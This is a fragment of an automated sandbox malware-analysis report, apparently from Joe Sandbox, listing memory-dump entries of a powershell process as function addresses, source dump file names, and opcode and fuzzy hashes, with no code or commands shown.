                            • Source File: 00000003.00000002.2208480636.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ffd9ba10000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 59ba8be7ebbb02299bc1d5a2a37985c5ecbec59aa3f7b6525b756142103f1909
                            • Instruction ID: c6b843d2397593e3421f4b6cf439b9902e2f65cacd136600b51b6e4dbc2237b9
                            • Opcode Fuzzy Hash: 59ba8be7ebbb02299bc1d5a2a37985c5ecbec59aa3f7b6525b756142103f1909
                            • Instruction Fuzzy Hash: C201677121CB0C4FD748EF0CE451AA5B7E0FB95364F10056DE59AC36A5D736E881CB45
                            Function 00007FFD9BAE5D9C Relevance: .0, Instructions: 29COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.2209048419.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ffd9bae0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c6895fa6a3fbb2a6e0733e53a14b60a81616c034b27f67422e5ed9c5abe5da0c
                            • Instruction ID: 428b15ba2e47d3862eccfd38654deafdb98768b3ff0ec30bceb62edbad3ba3a4
                            • Opcode Fuzzy Hash: c6895fa6a3fbb2a6e0733e53a14b60a81616c034b27f67422e5ed9c5abe5da0c
                            • Instruction Fuzzy Hash: 1BE0D853B0FA8D4FE795BA6C68A816877E1EF9A5A132441FBD04CC71E7DD584C0C4300
                            Function 00007FFD9BA17FAC Relevance: .0, Instructions: 12COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.2208480636.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ffd9ba10000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 30e9f1536e183556b0cd3eddd35efcd68dcfa65f9dedcb431df99d89d423210a
                            • Instruction ID: e4eef2cc7b5e0111b3450571a20b8327ae65aa567d343fca38905f92d7e7e1ab
                            • Opcode Fuzzy Hash: 30e9f1536e183556b0cd3eddd35efcd68dcfa65f9dedcb431df99d89d423210a
                            • Instruction Fuzzy Hash: D2C0807394E58C46FF716F5458510D67F50FF44100F052565E55C06051E9956B3C8281